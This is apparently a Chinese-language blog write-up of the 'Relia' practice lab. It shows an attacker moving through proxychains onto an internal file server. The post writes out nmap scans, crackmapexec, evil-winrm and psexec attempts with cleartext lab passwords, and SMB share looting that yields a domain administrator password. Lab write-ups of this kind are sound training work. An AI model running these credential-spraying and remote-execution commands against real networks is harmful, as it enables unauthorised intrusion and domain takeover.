Challenge 2 - Relia(9)
Challenge 2 - Relia(9)
下一個目標是內網的 FILE Server,電腦名稱是 FILES,IP 是 172.16.xxx.21
一樣先掃 TOP 100 Port,└─$ proxychains4 -q nmap -vvv -sT --top-ports=100 -Pn 172.16.172.21
用現有拿到的四個網域帳號測試看看
proxychains4 -q crackmapexec smb 172.16.172.21 -u maildmz -p 'DPuBT9tGCBrTbR'
proxychains4 -q crackmapexec smb 172.16.172.21 -u jim -p 'Castello1!'
proxychains4 -q crackmapexec smb 172.16.172.21 -u andrea -p 'PasswordPassword_6'
proxychains4 -q crackmapexec smb 172.16.172.21 -u michelle -p 'NotMyPassword0k?'
四個都是有用的
四個帳號測試 evil-winrm 都進不去
proxychains4 -q evil-winrm -i 172.16.172.21 -u maildmz -p 'DPuBT9tGCBrTbR'
proxychains4 -q evil-winrm -i 172.16.172.21 -u jim -p 'Castello1!'
proxychains4 -q evil-winrm -i 172.16.172.21 -u andrea -p 'PasswordPassword_6'
proxychains4 -q evil-winrm -i 172.16.172.21 -u michelle -p 'NotMyPassword0k?'
impacket-psexec 一樣沒有任何作用
proxychains4 -q impacket-psexec maildmz:DPuBT9tGCBrTbR@172.16.172.21
proxychains4 -q impacket-psexec jim:'Castello1!'@172.16.172.21
proxychains4 -q impacket-psexec andrea:'PasswordPassword_6'@172.16.172.21
proxychains4 -q impacket-psexec michelle:'NotMyPassword0k?'@172.16.172.21
四個帳號都先執行 SMB 分享列舉試試看有無不同
proxychains4 -q smbclient -L //172.16.172.21/ -U maildmz@relia.com --password='DPuBT9tGCBrTbR'
proxychains4 -q smbclient -L //172.16.172.21/ -U jim@relia.com --password='Castello1!'
proxychains4 -q smbclient -L //172.16.172.21/ -U andrea@relia.com --password='PasswordPassword_6'
proxychains4 -q smbclient -L //172.16.172.21/ -U michelle@relia.com --password='NotMyPassword0k?'
發現四個帳號可以看到的分享都一樣,有三個非常態的資料夾 apps、monitoring、scripts
先從 scripts 下手,proxychains4 -q smbclient \\\\172.16.172.21\\scripts -U jim@relia.com --password='Castello1!'
發了一段時間查看,沒啥發現
proxychains4 -q smbclient \\\\172.16.172.21\\apps -U jim@relia.com --password='Castello1!'
apps 裡面有許多資料夾,花了許多時間查看一樣沒有發現有價值的資訊
將檔案通通抓回來看
依據大小來查看,從最小的檔案開始看,在第二個檔案發現疑似帳號密碼的資訊
PS C:\Users\Administrator> $spass = ConvertTo-SecureString "vau!XCKjNQBv2$" -AsPlaintext -Force
administrator:vau!XCKjNQBv2$
馬上將拿到的帳號密碼測試看看
└─$ proxychains4 -q crackmapexec smb 172.16.172.21 -u administrator -p 'vau!XCKjNQBv2$'
不測試還好一測試嚇死人,這個是 relia.com 網域的 administrator 有效憑證
該不會這樣就把 AD 網域破台了吧
直接 impackex-psexec 進去試試看,└─$ proxychains4 -q impacket-psexec relia.com/administrator:'vau!XCKjNQBv2$'@172.16.172.21
更新攻擊列表
更新帳號密碼表,項次 21 是 Domain Admin 特別標示一下
留言
張貼留言